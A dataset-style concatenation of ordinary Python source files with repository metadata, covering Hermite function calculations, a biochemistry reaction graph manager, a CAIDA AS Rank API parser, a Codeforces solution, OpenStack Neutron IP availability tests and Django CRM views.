(6, 2, 5, 4)
>>> reshape = ([0, 1, 2, 3], [1, 3, 2, 0])
>>> psi = hermite_functions(n, x, all_n=True, move_axes=reshape)
>>> psi.shape
(4, 6, 5, 2)
"""
if method not in ["recursive", "analytic", "direct"]:
raise ValueError("Method not recognized.")
if not (issubclass(type(n), int) or issubclass(type(n), np.integer)):
raise TypeError("n must be an integer.")
if n < 0:
raise ValueError("n must be non-negative.")
if method == "analytic" and (n > 5):
raise ValueError("n must not be greater than 5 for analytic calculation.")
if all_n:
psi_n = _Hermite_all_n(n, x, method)
else:
psi_n = _Hermite_single_n(n, x, method)
if move_axes:
psi_n = np.moveaxis(psi_n, move_axes[0], move_axes[1])
return psi_n
def _Hermite_single_n(n, x, method):
"""
Calculates psi_n(x) for a single value of n.
"""
if method == "analytic":
return _H_analytic(n, x)
if method == "direct":
return _H_direct(n, x)
psi_m_minus_2 = _H_analytic(0, x)
if n == 0:
return psi_m_minus_2
psi_m_minus_1 = _H_analytic(1, x)
if n == 1:
return psi_m_minus_1
for m in range(2, n + 1):
psi_m = _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1)
psi_m_minus_2 = psi_m_minus_1
psi_m_minus_1 = psi_m
return psi_m
def _Hermite_all_n(n, x, method):
"""
Calcualtes psi_m(x) for all 0 <= m <= n.
"""
try:
psi_n = np.zeros((n + 1,) + x.shape)
except AttributeError: # x does not have property 'shape'
psi_n = np.zeros((n + 1, 1))
if method == "analytic":
for m in range(n + 1):
psi_n[m, :] = _H_analytic(m, x)
return psi_n
if method == "direct":
for m in range(n + 1):
psi_n[m, :] = _H_direct(m, x)
return psi_n
psi_n[0, :] = _H_analytic(0, x)
if n == 0:
return psi_n
psi_n[1, :] = _H_analytic(1, x)
if n == 1:
return psi_n
for m in range(2, n + 1):
psi_n[m, :] = _H_recursive(m, x, psi_n[m - 2, :], psi_n[m - 1, :])
return psi_n
def _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1):
"""
Calculate psi_m(x) using recursion relation.
"""
return np.sqrt(2 / m) * x * psi_m_minus_1 - np.sqrt((m - 1) / m) * psi_m_minus_2
def _H_analytic(n, x):
"""
Analytic expressions for psi_n(x) for 0 <= n <= 5.
"""
if n == 0:
return np.pi ** (-1 / 4) * np.exp(-(x ** 2) / 2)
if n == 1:
return np.sqrt(2) * np.pi ** (-1 / 4) * x * np.exp(-(x ** 2) / 2)
if n == 2:
return (
(np.sqrt(2) * np.pi ** (1 / 4)) ** (-1)
* (2 * x ** 2 - 1)
* np.exp(-(x ** 2) / 2)
)
if n == 3:
return (
(np.sqrt(3) * np.pi ** (1 / 4)) ** (-1)
* (2 * x ** 3 - 3 * x)
* np.exp(-(x ** 2) / 2)
)
if n == 4:
return (
(2 * np.sqrt(6) * np.pi ** (1 / 4)) ** (-1)
* (4 * x ** 4 - 12 * x ** 2 + 3)
* np.exp(-(x ** 2) / 2)
)
if n == 5:
return (
(2 * np.sqrt(15) * np.pi ** (1 / 4)) ** (-1)
* (4 * x ** 5 - 20 * x ** 3 + 15 * x)
* np.exp(-(x ** 2) / 2)
)
raise ValueError("n must be an integer between 0 and 5")
def _H_direct(n, x):
"""
Calculate psi_n(x) using explicit definition.
"""
return (
1
/ np.sqrt(2 ** n * factorial(n))
* np.pi ** (-1 / 4)
* np.exp(-(x ** 2) / 2)
* eval_hermite(n, x)
)
if __name__ == "__main__":
import doctest
doctest.testmod()
| 0 | 0 | 0 |
9181edf2bd0bc5bea757c317ebd41cf545bd2f15 | 2,979 | py | Python | sbcdb/reaction_utils.py | neilswainston/Grimoire | 42775ff9a03fdbd3b47269b46c883fdf5b37a2be | [
"MIT"
] | 9 | 2019-04-24T12:47:10.000Z | 2021-05-12T12:46:33.000Z | sbcdb/reaction_utils.py | neilswainston/Grimoire | 42775ff9a03fdbd3b47269b46c883fdf5b37a2be | [
"MIT"
] | 1 | 2017-01-16T08:45:19.000Z | 2017-01-16T08:45:19.000Z | sbcdb/reaction_utils.py | synbiochem/biochem4j | 42775ff9a03fdbd3b47269b46c883fdf5b37a2be | [
"MIT"
] | 5 | 2019-10-13T14:02:28.000Z | 2020-12-23T18:44:29.000Z | '''
SYNBIOCHEM-DB (c) University of Manchester 2015
SYNBIOCHEM-DB is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
from sbcdb.enzyme_utils import EnzymeManager
class ReactionManager(object):
'''Class to implement a manager of Reaction data.'''
def __init__(self):
'''Constructor.'''
self.__nodes = {}
self.__reac_ids = {}
self.__reac_enz_rels = []
self.__org_enz_rels = []
self.__enz_man = EnzymeManager()
def write_files(self, writer):
'''Write neo4j import files.'''
return ([writer.write_nodes(self.__nodes.values(),
'Reaction'),
writer.write_nodes(self.__enz_man.get_nodes(),
'Enzyme')],
[writer.write_rels(self.__reac_enz_rels,
'Reaction', 'Enzyme'),
writer.write_rels(self.__enz_man.get_org_enz_rels(),
'Organism', 'Enzyme')])
def add_reaction(self, source, reac_id, properties):
'''Adds a reaction to the collection of nodes, ensuring uniqueness.'''
reac_id = self.__reac_ids[source + reac_id] \
if source + reac_id in self.__reac_ids else reac_id
if reac_id not in self.__nodes:
properties[':LABEL'] = 'Reaction'
properties['id:ID(Reaction)'] = reac_id
properties['source'] = source
properties[source] = reac_id
self.__nodes[reac_id] = properties
if 'mnx' in properties:
self.__reac_ids['mnx' + properties['mnx']] = reac_id
if 'kegg.reaction' in properties:
self.__reac_ids[
'kegg.reaction' + properties['kegg.reaction']] = reac_id
if 'rhea' in properties:
self.__reac_ids['rhea' + properties['rhea']] = reac_id
else:
self.__nodes[reac_id].update(properties)
return reac_id
def add_react_to_enz(self, data, source, num_threads=0):
'''Submit data to the graph.'''
# Create Reaction and Enzyme nodes:
enzyme_ids = self.__create_react_enz(data, source)
# Create Enzyme nodes:
self.__enz_man.add_uniprot_data(enzyme_ids, source, num_threads)
def __create_react_enz(self, data, source):
'''Creates Reaction and Enzyme nodes and their Relationships.'''
enzyme_ids = []
for reac_id, uniprot_ids in data.iteritems():
reac_id = self.add_reaction(source, reac_id, {})
for uniprot_id in uniprot_ids:
enzyme_ids.append(uniprot_id)
self.__reac_enz_rels.append([reac_id, 'catalysed_by',
uniprot_id,
{'source': source}])
return list(set(enzyme_ids))
| 35.891566 | 78 | 0.570326 | '''
SYNBIOCHEM-DB (c) University of Manchester 2015
SYNBIOCHEM-DB is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
from sbcdb.enzyme_utils import EnzymeManager
class ReactionManager(object):
'''Class to implement a manager of Reaction data.'''
def __init__(self):
'''Constructor.'''
self.__nodes = {}
self.__reac_ids = {}
self.__reac_enz_rels = []
self.__org_enz_rels = []
self.__enz_man = EnzymeManager()
def write_files(self, writer):
'''Write neo4j import files.'''
return ([writer.write_nodes(self.__nodes.values(),
'Reaction'),
writer.write_nodes(self.__enz_man.get_nodes(),
'Enzyme')],
[writer.write_rels(self.__reac_enz_rels,
'Reaction', 'Enzyme'),
writer.write_rels(self.__enz_man.get_org_enz_rels(),
'Organism', 'Enzyme')])
def add_reaction(self, source, reac_id, properties):
'''Adds a reaction to the collection of nodes, ensuring uniqueness.'''
reac_id = self.__reac_ids[source + reac_id] \
if source + reac_id in self.__reac_ids else reac_id
if reac_id not in self.__nodes:
properties[':LABEL'] = 'Reaction'
properties['id:ID(Reaction)'] = reac_id
properties['source'] = source
properties[source] = reac_id
self.__nodes[reac_id] = properties
if 'mnx' in properties:
self.__reac_ids['mnx' + properties['mnx']] = reac_id
if 'kegg.reaction' in properties:
self.__reac_ids[
'kegg.reaction' + properties['kegg.reaction']] = reac_id
if 'rhea' in properties:
self.__reac_ids['rhea' + properties['rhea']] = reac_id
else:
self.__nodes[reac_id].update(properties)
return reac_id
def add_react_to_enz(self, data, source, num_threads=0):
'''Submit data to the graph.'''
# Create Reaction and Enzyme nodes:
enzyme_ids = self.__create_react_enz(data, source)
# Create Enzyme nodes:
self.__enz_man.add_uniprot_data(enzyme_ids, source, num_threads)
def __create_react_enz(self, data, source):
'''Creates Reaction and Enzyme nodes and their Relationships.'''
enzyme_ids = []
for reac_id, uniprot_ids in data.iteritems():
reac_id = self.add_reaction(source, reac_id, {})
for uniprot_id in uniprot_ids:
enzyme_ids.append(uniprot_id)
self.__reac_enz_rels.append([reac_id, 'catalysed_by',
uniprot_id,
{'source': source}])
return list(set(enzyme_ids))
| 0 | 0 | 0 |
173faf3fa2e7960c16e61ab2a3f0a1a52bc4c745 | 3,830 | py | Python | lib_bgp_data/collectors/as_rank_v2/as_rank_v2_parser.py | jfuruness/lib_bgp_data | 25f7d57b9e2101c7aefb325e8d728bd91f47d557 | [
"BSD-3-Clause"
] | 16 | 2018-09-24T05:10:03.000Z | 2021-11-29T19:18:59.000Z | lib_bgp_data/collectors/as_rank_v2/as_rank_v2_parser.py | jfuruness/lib_bgp_data | 25f7d57b9e2101c7aefb325e8d728bd91f47d557 | [
"BSD-3-Clause"
] | 4 | 2019-10-09T18:54:17.000Z | 2021-03-05T14:02:50.000Z | lib_bgp_data/collectors/as_rank_v2/as_rank_v2_parser.py | jfuruness/lib_bgp_data | 25f7d57b9e2101c7aefb325e8d728bd91f47d557 | [
"BSD-3-Clause"
] | 3 | 2018-09-17T17:35:18.000Z | 2020-03-24T16:03:31.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Contains AS_Rank_V2 which parses AS Rank data using the Restful API
In contrast to the previous parser this also gets organization, rank,
and links to other ASNs"""
__author__ = "Nicholas Shpetner"
__credits__ = ["Nicholas Shpetner", "Abhinna Adhikari", "Justin Furuness"]
__Lisence__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com"
__status__ = "Production"
import os
import json
import urllib.request
import time
from .tables import AS_Rank_V2
from ...utils import utils
from ...utils.base_classes import Parser
class AS_Rank_Parser_V2(Parser):
"""Parses the AS rank data from https://asrank.caida.org/
"""
__slots__ = []
url_base = 'https://api.asrank.caida.org/v2/restful/'
header_base = {'accept': 'application/json'}
def _run(self, first_rank=None, last_rank=None):
"""Parses the AS rank data from https://asrank.caida.org/
"""
# Clear the table before every run
with AS_Rank_V2(clear=True) as db:
pass
if first_rank is not None and last_rank is not None:
assert last_rank > first_rank
next_page = True
# Defaults
first = 10000
offset = 0
count = 1
final_count = 0
if first_rank is not None:
offset = first_rank
count = first_rank
if last_rank is not None:
if (last_rank - first_rank) < 10000:
first = last_rank - first_rank
rows = []
while(next_page):
url = self.url_base + f"asns/?first={first}&offset={offset}"
req = urllib.request.Request(url, None, self.header_base)
with urllib.request.urlopen(req) as response:
page = response.read()
data = json.loads(page.decode('utf-8'))
asns = data['data']['asns']
for asn in asns['edges']:
node = asn['node']
asn = int(node['asn'])
rank = int(node['rank'])
links = self._get_links(asn)
rows.append([rank, asn, node['asnName'], links])
count += 1
if asns['pageInfo']['hasNextPage'] is False:
next_page = False
final_count = asns['totalCount']
if last_rank is not None:
if count >= last_rank:
next_page = False
final_count = asns['totalCount']
elif (first + count) >= last_rank:
first = last_rank - count + 1
offset = count
path = os.path.join(self.csv_dir, 'as_rank_v2.csv')
utils.rows_to_db(rows, path, AS_Rank_V2, clear_table=False)
return final_count
| 32.735043 | 81 | 0.538381 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Contains AS_Rank_V2 which parses AS Rank data using the Restful API
In contrast to the previous parser this also gets organization, rank,
and links to other ASNs"""
__author__ = "Nicholas Shpetner"
__credits__ = ["Nicholas Shpetner", "Abhinna Adhikari", "Justin Furuness"]
__Lisence__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com"
__status__ = "Production"
import os
import json
import urllib.request
import time
from .tables import AS_Rank_V2
from ...utils import utils
from ...utils.base_classes import Parser
class AS_Rank_Parser_V2(Parser):
"""Parses the AS rank data from https://asrank.caida.org/
"""
__slots__ = []
url_base = 'https://api.asrank.caida.org/v2/restful/'
header_base = {'accept': 'application/json'}
def _run(self, first_rank=None, last_rank=None):
"""Parses the AS rank data from https://asrank.caida.org/
"""
# Clear the table before every run
with AS_Rank_V2(clear=True) as db:
pass
if first_rank is not None and last_rank is not None:
assert last_rank > first_rank
next_page = True
# Defaults
first = 10000
offset = 0
count = 1
final_count = 0
if first_rank is not None:
offset = first_rank
count = first_rank
if last_rank is not None:
if (last_rank - first_rank) < 10000:
first = last_rank - first_rank
rows = []
while(next_page):
url = self.url_base + f"asns/?first={first}&offset={offset}"
req = urllib.request.Request(url, None, self.header_base)
with urllib.request.urlopen(req) as response:
page = response.read()
data = json.loads(page.decode('utf-8'))
asns = data['data']['asns']
for asn in asns['edges']:
node = asn['node']
asn = int(node['asn'])
rank = int(node['rank'])
links = self._get_links(asn)
rows.append([rank, asn, node['asnName'], links])
count += 1
if asns['pageInfo']['hasNextPage'] is False:
next_page = False
final_count = asns['totalCount']
if last_rank is not None:
if count >= last_rank:
next_page = False
final_count = asns['totalCount']
elif (first + count) >= last_rank:
first = last_rank - count + 1
offset = count
path = os.path.join(self.csv_dir, 'as_rank_v2.csv')
utils.rows_to_db(rows, path, AS_Rank_V2, clear_table=False)
return final_count
def _get_links(self, asn):
offset = 0
first = 1000
next_page = True
# Can't use a python array due to psql not accepting it easy
rows = '{'
while(next_page):
url = self.url_base + f"asnLinks/{asn}?first={first}&offset={offset}"
req = urllib.request.Request(url, None, self.header_base)
with urllib.request.urlopen(req) as response:
page = response.read()
data = json.loads(page.decode('utf-8'))
asn_links = data['data']['asnLinks']
if asn_links['edges'] == []:
return '{}'
for link in asn_links['edges']:
rows += link['node']['asn1']['asn'] + ','
if asn_links['pageInfo']['hasNextPage'] is False:
rows = rows[:-1] + '}'
return rows
else:
offset = offset + 1000
| 937 | 0 | 27 |
c51ed96a09e740368a84781e4fac620344758b83 | 393 | py | Python | codeforces.com/758A/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/758A/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/758A/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | max_theoretical_welfare = 1000000
number_of_citizens = int(input())
total_money_spent = 0
max_welfare = 0
for current_welfare in map(int, input().split()):
total_money_spent += (max_theoretical_welfare - current_welfare)
if current_welfare > max_welfare:
max_welfare = current_welfare
print(total_money_spent - number_of_citizens * (max_theoretical_welfare - max_welfare))
| 28.071429 | 87 | 0.776081 | max_theoretical_welfare = 1000000
number_of_citizens = int(input())
total_money_spent = 0
max_welfare = 0
for current_welfare in map(int, input().split()):
total_money_spent += (max_theoretical_welfare - current_welfare)
if current_welfare > max_welfare:
max_welfare = current_welfare
print(total_money_spent - number_of_citizens * (max_theoretical_welfare - max_welfare))
| 0 | 0 | 0 |
868d131e12bd9fc7e48c6715c9f81639852f6958 | 19,704 | py | Python | neutron/tests/unit/extensions/test_network_ip_availability.py | ilay09/neutron | b7f9803c88b17a6ebd40fd44d15d4336bea7b394 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/extensions/test_network_ip_availability.py | ilay09/neutron | b7f9803c88b17a6ebd40fd44d15d4336bea7b394 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/extensions/test_network_ip_availability.py | ilay09/neutron | b7f9803c88b17a6ebd40fd44d15d4336bea7b394 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 GoDaddy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron_lib import constants
import neutron.api.extensions as api_ext
import neutron.common.config as config
import neutron.extensions
import neutron.services.network_ip_availability.plugin as plugin_module
import neutron.tests.unit.db.test_db_base_plugin_v2 as test_db_base_plugin_v2
API_RESOURCE = 'network-ip-availabilities'
IP_AVAIL_KEY = 'network_ip_availability'
IP_AVAILS_KEY = 'network_ip_availabilities'
EXTENSIONS_PATH = ':'.join(neutron.extensions.__path__)
PLUGIN_NAME = '%s.%s' % (plugin_module.NetworkIPAvailabilityPlugin.__module__,
plugin_module.NetworkIPAvailabilityPlugin.__name__)
| 51.989446 | 79 | 0.545321 | # Copyright 2016 GoDaddy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron_lib import constants
import neutron.api.extensions as api_ext
import neutron.common.config as config
import neutron.extensions
import neutron.services.network_ip_availability.plugin as plugin_module
import neutron.tests.unit.db.test_db_base_plugin_v2 as test_db_base_plugin_v2
API_RESOURCE = 'network-ip-availabilities'
IP_AVAIL_KEY = 'network_ip_availability'
IP_AVAILS_KEY = 'network_ip_availabilities'
EXTENSIONS_PATH = ':'.join(neutron.extensions.__path__)
PLUGIN_NAME = '%s.%s' % (plugin_module.NetworkIPAvailabilityPlugin.__module__,
plugin_module.NetworkIPAvailabilityPlugin.__name__)
class TestNetworkIPAvailabilityAPI(
test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
svc_plugins = {'plugin_name': PLUGIN_NAME}
super(TestNetworkIPAvailabilityAPI, self).setUp(
service_plugins=svc_plugins)
self.plugin = plugin_module.NetworkIPAvailabilityPlugin()
ext_mgr = api_ext.PluginAwareExtensionManager(
EXTENSIONS_PATH, {"network-ip-availability": self.plugin}
)
app = config.load_paste_app('extensions_test_app')
self.ext_api = api_ext.ExtensionMiddleware(app, ext_mgr=ext_mgr)
def _validate_availability(self, network, availability, expected_used_ips,
expected_total_ips=253):
self.assertEqual(network['name'], availability['network_name'])
self.assertEqual(network['id'], availability['network_id'])
self.assertEqual(expected_used_ips, availability['used_ips'])
self.assertEqual(expected_total_ips, availability['total_ips'])
def _validate_from_availabilities(self, availabilities, wrapped_network,
expected_used_ips,
expected_total_ips=253):
network = wrapped_network['network']
availability = self._find_availability(availabilities, network['id'])
self.assertIsNotNone(availability)
self._validate_availability(network, availability,
expected_used_ips=expected_used_ips,
expected_total_ips=expected_total_ips)
def test_usages_query_list_with_fields_total_ips(self):
with self.network() as net:
with self.subnet(network=net):
# list by query fields: total_ips
params = 'fields=total_ips'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
availability = response[IP_AVAILS_KEY][0]
self.assertIn('total_ips', availability)
self.assertEqual(253, availability['total_ips'])
self.assertNotIn('network_id', availability)
def test_usages_query_show_with_fields_total_ips(self):
with self.network() as net:
with self.subnet(network=net):
network = net['network']
# Show by query fields: total_ips
params = ['total_ips']
request = self.new_show_request(API_RESOURCE,
network['id'],
fields=params)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
availability = response[IP_AVAIL_KEY]
self.assertIn('total_ips', availability)
self.assertEqual(253, availability['total_ips'])
self.assertNotIn('network_id', availability)
@staticmethod
def _find_availability(availabilities, net_id):
for ip_availability in availabilities:
if net_id == ip_availability['network_id']:
return ip_availability
def test_basic(self):
with self.network() as net:
with self.subnet(network=net):
network = net['network']
# Get ALL
request = self.new_list_request(API_RESOURCE, self.fmt)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get single via id
request = self.new_show_request(API_RESOURCE, network['id'])
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
usage = response[IP_AVAIL_KEY]
self._validate_availability(network, usage, 0)
def test_usages_multi_nets_subnets(self):
with self.network(name='net1') as n1,\
self.network(name='net2') as n2,\
self.network(name='net3') as n3:
# n1 should have 2 subnets, n2 should have none, n3 has 1
with self.subnet(network=n1) as subnet1_1, \
self.subnet(cidr='40.0.0.0/24', network=n3) as subnet3_1:
# Consume 3 ports n1, none n2, 2 ports on n3
with self.port(subnet=subnet1_1),\
self.port(subnet=subnet1_1),\
self.port(subnet=subnet1_1),\
self.port(subnet=subnet3_1),\
self.port(subnet=subnet3_1):
# Test get ALL
request = self.new_list_request(API_RESOURCE)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(3, len(response[IP_AVAILS_KEY]))
data = response[IP_AVAILS_KEY]
self._validate_from_availabilities(data, n1, 3, 253)
self._validate_from_availabilities(data, n2, 0, 0)
self._validate_from_availabilities(data, n3, 2, 253)
# Test get single via network id
network = n1['network']
request = self.new_show_request(API_RESOURCE,
network['id'])
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
self._validate_availability(network,
response[IP_AVAIL_KEY], 3, 253)
def test_usages_multi_nets_subnets_sums(self):
with self.network(name='net1') as n1:
# n1 has 2 subnets
with self.subnet(network=n1) as subnet1_1, \
self.subnet(cidr='40.0.0.0/24', network=n1) as subnet1_2:
# Consume 3 ports n1: 1 on subnet 1 and 2 on subnet 2
with self.port(subnet=subnet1_1),\
self.port(subnet=subnet1_2),\
self.port(subnet=subnet1_2):
# Get ALL
request = self.new_list_request(API_RESOURCE)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
n1, 3, 506)
# Get single via network id
network = n1['network']
request = self.new_show_request(API_RESOURCE,
network['id'])
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
self._validate_availability(network,
response[IP_AVAIL_KEY], 3, 506)
def test_usages_port_consumed_v4(self):
with self.network() as net:
with self.subnet(network=net) as subnet:
request = self.new_list_request(API_RESOURCE)
# Consume 2 ports
with self.port(subnet=subnet), self.port(subnet=subnet):
response = self.deserialize(self.fmt,
request.get_response(
self.ext_api))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 2)
def test_usages_query_ip_version_v4(self):
with self.network() as net:
with self.subnet(network=net):
# Get IPv4
params = 'ip_version=4'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get IPv6 should return empty array
params = 'ip_version=6'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_query_ip_version_v6(self):
with self.network() as net:
with self.subnet(
network=net, cidr='2607:f0d0:1002:51::/64',
ip_version=6,
ipv6_address_mode=constants.DHCPV6_STATELESS):
# Get IPv6
params = 'ip_version=6'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(
response[IP_AVAILS_KEY], net, 0, 18446744073709551614)
# Get IPv4 should return empty array
params = 'ip_version=4'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_ports_consumed_v6(self):
with self.network() as net:
with self.subnet(
network=net, cidr='2607:f0d0:1002:51::/64',
ip_version=6,
ipv6_address_mode=constants.DHCPV6_STATELESS) as subnet:
request = self.new_list_request(API_RESOURCE)
# Consume 3 ports
with self.port(subnet=subnet),\
self.port(subnet=subnet), \
self.port(subnet=subnet):
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 3,
18446744073709551614)
def test_usages_query_network_id(self):
with self.network() as net:
with self.subnet(network=net):
network = net['network']
test_id = network['id']
# Get by query param: network_id
params = 'network_id=%s' % test_id
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get by NON-matching query param: network_id
params = 'network_id=clearlywontmatch'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_query_network_name(self):
test_name = 'net_name_1'
with self.network(name=test_name) as net:
with self.subnet(network=net):
# Get by query param: network_name
params = 'network_name=%s' % test_name
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get by NON-matching query param: network_name
params = 'network_name=clearly-wont-match'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_query_tenant_id(self):
test_tenant_id = 'a-unique-test-id'
with self.network(tenant_id=test_tenant_id) as net:
with self.subnet(network=net):
# Get by query param: network_name
params = 'tenant_id=%s' % test_tenant_id
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
for net_avail in response[IP_AVAILS_KEY]:
self.assertEqual(test_tenant_id, net_avail['tenant_id'])
# Get by NON-matching query param: network_name
params = 'tenant_id=clearly-wont-match'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_multi_net_multi_subnet_46(self):
# Setup mixed v4/v6 networks with IPs consumed on each
with self.network(name='net-v6-1') as net_v6_1, \
self.network(name='net-v6-2') as net_v6_2, \
self.network(name='net-v4-1') as net_v4_1, \
self.network(name='net-v4-2') as net_v4_2:
with self.subnet(network=net_v6_1, cidr='2607:f0d0:1002:51::/64',
ip_version=6) as s61, \
self.subnet(network=net_v6_2,
cidr='2607:f0d0:1003:52::/64',
ip_version=6) as s62, \
self.subnet(network=net_v4_1, cidr='10.0.0.0/24') as s41, \
self.subnet(network=net_v4_2, cidr='10.0.1.0/24') as s42:
with self.port(subnet=s61),\
self.port(subnet=s62), self.port(subnet=s62), \
self.port(subnet=s41), \
self.port(subnet=s42), self.port(subnet=s42):
# Verify consumption across all
request = self.new_list_request(API_RESOURCE)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
avails_list = response[IP_AVAILS_KEY]
self._validate_from_availabilities(
avails_list, net_v6_1, 1, 18446744073709551614)
self._validate_from_availabilities(
avails_list, net_v6_2, 2, 18446744073709551614)
self._validate_from_availabilities(
avails_list, net_v4_1, 1, 253)
self._validate_from_availabilities(
avails_list, net_v4_2, 2, 253)
# Query by IP versions. Ensure subnet versions match
for ip_ver in [4, 6]:
params = 'ip_version=%i' % ip_ver
request = self.new_list_request(API_RESOURCE,
params=params)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
for net_avail in response[IP_AVAILS_KEY]:
for sub in net_avail['subnet_ip_availability']:
self.assertEqual(ip_ver, sub['ip_version'])
# Verify consumption querying 2 network ids (IN clause)
request = self.new_list_request(
API_RESOURCE,
params='network_id=%s&network_id=%s'
% (net_v4_2['network']['id'],
net_v6_2['network']['id']))
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
avails_list = response[IP_AVAILS_KEY]
self._validate_from_availabilities(
avails_list, net_v6_2, 2, 18446744073709551614)
self._validate_from_availabilities(
avails_list, net_v4_2, 2, 253)
| 17,916 | 549 | 23 |
216a9777e24096faf53003965097897032262b52 | 1,530 | py | Python | leads/views.py | tapanhp/django_crm | d092af1faf37c62674dc05d5faaeeba5fcc6bb68 | [
"MIT"
] | null | null | null | leads/views.py | tapanhp/django_crm | d092af1faf37c62674dc05d5faaeeba5fcc6bb68 | [
"MIT"
] | null | null | null | leads/views.py | tapanhp/django_crm | d092af1faf37c62674dc05d5faaeeba5fcc6bb68 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from .models import Lead, Agent
from .forms import LeadModelForm, LeadForm
from django.views.generic import TemplateView
# The newest implementation supporting model forms
| 30 | 84 | 0.69085 | from django.shortcuts import render, redirect
from .models import Lead, Agent
from .forms import LeadModelForm, LeadForm
from django.views.generic import TemplateView
class LandingPageView(TemplateView):
template_name = "landing.html"
class LeadListView(TemplateView):
template_name = "leads/lead_list.html"
extra_context = dict(leads=Lead.objects.all())
def lead_details(request, pk):
lead = Lead.objects.get(pk=pk)
context = {"current_lead": lead}
